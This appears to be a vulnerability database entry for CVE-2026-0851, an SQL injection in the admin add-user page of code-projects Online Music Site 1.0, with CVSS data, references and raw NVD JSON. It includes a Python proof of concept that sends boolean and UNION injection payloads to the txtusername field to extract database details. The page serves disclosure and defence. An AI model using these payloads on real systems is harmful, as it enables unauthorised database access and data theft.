CVE-2026-0851

Description

A vulnerability was identified in code-projects Online Music Site 1.0. The affected element is an unknown function of the file /Administrator/PHP/AdminAddUser.php. The manipulation of the argument txtusername leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:online_music_site:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Music Site 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-0851 SQL Injection PoC # Target: code-projects Online Music Site 1.0 # Endpoint: /Administrator/PHP/AdminAddUser.php # Parameter: txtusername import requests import sys target_url = "http://target-site.com/Administrator/PHP/AdminAddUser.php" # Basic SQL Injection PoC - Boolean Based def test_sql_injection(): # Normal request normal_data = { 'txtusername': 'testuser', 'txtpassword': 'testpass', 'txtemail': '[email protected]', 'btnadd': 'Add User' } # Malicious payload - SQL Injection test # This payload tests for SQL injection vulnerability payload = "' OR '1'='1" malicious_data = { 'txtusername': payload, 'txtpassword': 'testpass', 'txtemail': '[email protected]', 'btnadd': 'Add User' } print("[*] Testing CVE-2026-0851 SQL Injection...") print(f"[*] Target: {target_url}") try: # Send normal request normal_response = requests.post(target_url, data=normal_data, timeout=10) print(f"[+] Normal request status: {normal_response.status_code}") # Send malicious request malicious_response = requests.post(target_url, data=malicious_data, timeout=10) print(f"[+] Malicious request status: {malicious_response.status_code}") # Check for SQL error indicators if 'sql' in malicious_response.text.lower() or 'error' in malicious_response.text.lower(): print("[!] SQL Injection vulnerability confirmed!") print("[!] Server returned SQL error message") return True # Check for different response behavior if len(malicious_response.text) != len(normal_response.text): print("[!] SQL Injection vulnerability confirmed!") print("[!] Response length differs between normal and malicious requests") return True print("[-] Vulnerability not detected with basic test") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False # UNION-based data extraction example def extract_database_info(): """Example: Extract database version using UNION injection""" union_payload = "' UNION SELECT NULL,version(),user(),database()-- -" data = { 'txtusername': union_payload, 'txtpassword': 'test', 'txtemail': '[email protected]', 'btnadd': 'Add User' } try: response = requests.post(target_url, data=data, timeout=10) print(f"[*] Database extraction response length: {len(response.text)}") return response.text except: return None if __name__ == "__main__": test_sql_injection()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0851
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0851
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0851/
[4] VulDB https://vuldb.com/cve/CVE-2026-0851
[5] https://code-projects.org/
[6] https://github.com/tuo159515/sql-injection/issues/2
[7] https://vuldb.com/?ctiid.340446
[8] https://vuldb.com/?id.340446
[9] https://vuldb.com/?submit.733644

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0851", "sourceIdentifier": "[email protected]", "published": "2026-01-12T00:15:52.763", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in code-projects Online Music Site 1.0. The affected element is an unknown function of the file /Administrator/PHP/AdminAddUser.php. The manipulation of the argument txtusername leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used."}, {"lang": "es", "value": "Una vulnerabilidad fue identificada en code-projects Online Music Site 1.0. El elemento afectado es una función desconocida del archivo /Administrator/PHP/AdminAddUser.php. La manipulación del argumento txtusername conduce a inyección SQL. La explotación remota del ataque es posible. El exploit está disponible públicamente y podría ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_music_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EEE01F25-5D13-4657-A849-2AA9890C8510"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/tuo159515/sql-injection/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.340446", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.340446", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.733644", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}